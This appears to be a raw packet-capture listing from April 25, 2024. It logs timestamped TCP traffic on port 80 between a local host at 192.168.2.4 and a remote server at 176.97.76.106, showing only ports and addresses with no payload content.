Apr 25, 2024 12:16:10.787906885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787924051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787933111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787955046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787975073 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787986994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788032055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788050890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788057089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788115025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788119078 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788547039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788564920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788580894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788598061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788614035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788630009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788631916 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788631916 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788645029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788660049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788664103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788681030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788697004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788713932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788729906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788747072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788748026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788748980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788764000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788780928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788799047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788815975 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788815975 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788817883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788832903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788851023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788866997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788883924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788892984 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788892984 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788899899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788917065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788929939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788933992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788948059 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.788949966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788968086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788985014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.788986921 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789001942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789043903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789048910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789091110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789149046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789165974 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789181948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789205074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789222956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789263010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789263010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789319992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789338112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789354086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789356947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789371014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789388895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789406061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789419889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789422989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789434910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789463043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789469004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789480925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789540052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789587021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789617062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789633989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789650917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789668083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789681911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789685011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789697886 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789730072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789755106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789772034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789788008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789803982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789819956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789849043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789854050 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789865017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789882898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789900064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789925098 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.789952040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.789989948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790013075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790030956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790071964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790097952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790116072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790147066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790163040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790189028 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790203094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790219069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790235996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790276051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790307045 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790307045 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790309906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790342093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790395021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790399075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790417910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790482998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790499926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790512085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790515900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790533066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790550947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790560961 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790577888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790740967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790823936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790828943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790887117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790946007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.790950060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.790980101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791019917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791078091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791100025 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791121960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791132927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791152000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791188002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791234970 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791251898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791260958 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791268110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791287899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791302919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791342020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791357994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791374922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791393995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791421890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791448116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791450024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791467905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791515112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791529894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791554928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791572094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791599989 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791632891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791651964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791668892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791686058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791704893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791718006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791723013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791749954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791754007 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791779995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791796923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791871071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791871071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791888952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791919947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791933060 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791944027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791960955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.791989088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.791996002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792012930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792026997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792042971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792061090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792098045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792124033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792140961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792165041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792176008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792188883 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792192936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792267084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792284012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792285919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792346954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792359114 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792376041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792392969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792424917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792442083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792443037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792484999 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792511940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792530060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792565107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792606115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792653084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792711973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792728901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792746067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792759895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792759895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792763948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792781115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792802095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792810917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792829037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792855978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792874098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792906046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.792942047 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792942047 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.792957067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793028116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793045044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793092966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793112040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793128967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793159962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793174982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793178082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793236017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793236971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793282032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793283939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793298960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793349981 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793359041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793376923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793446064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793451071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793469906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793514013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793534994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793551922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793592930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793610096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793626070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793634892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793642998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793678045 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793689013 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793699980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793734074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793750048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793766022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793783903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793793917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793833971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793850899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793867111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793869019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793889999 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793920994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793948889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.793977022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.793993950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794027090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794039011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794056892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794086933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794091940 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794105053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794178963 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794182062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794199944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794217110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794224024 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794253111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794264078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794282913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794298887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794317007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794342041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794363022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794369936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794423103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794445992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794462919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794480085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794501066 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794523001 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794540882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794558048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794574976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794605970 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794621944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794621944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794621944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794639111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794668913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794680119 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794698954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794704914 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794781923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794799089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794815063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794832945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794836998 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794853926 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794888020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794904947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794945002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.794970989 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.794996023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795011044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795027971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795044899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795063019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795089006 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795114994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795116901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795161963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795192957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795201063 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795243979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795259953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795304060 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795316935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795334101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795367002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795389891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795471907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.795475960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795494080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.795511007 CEST	80	49733	176.97.76.106	192.168.2.4
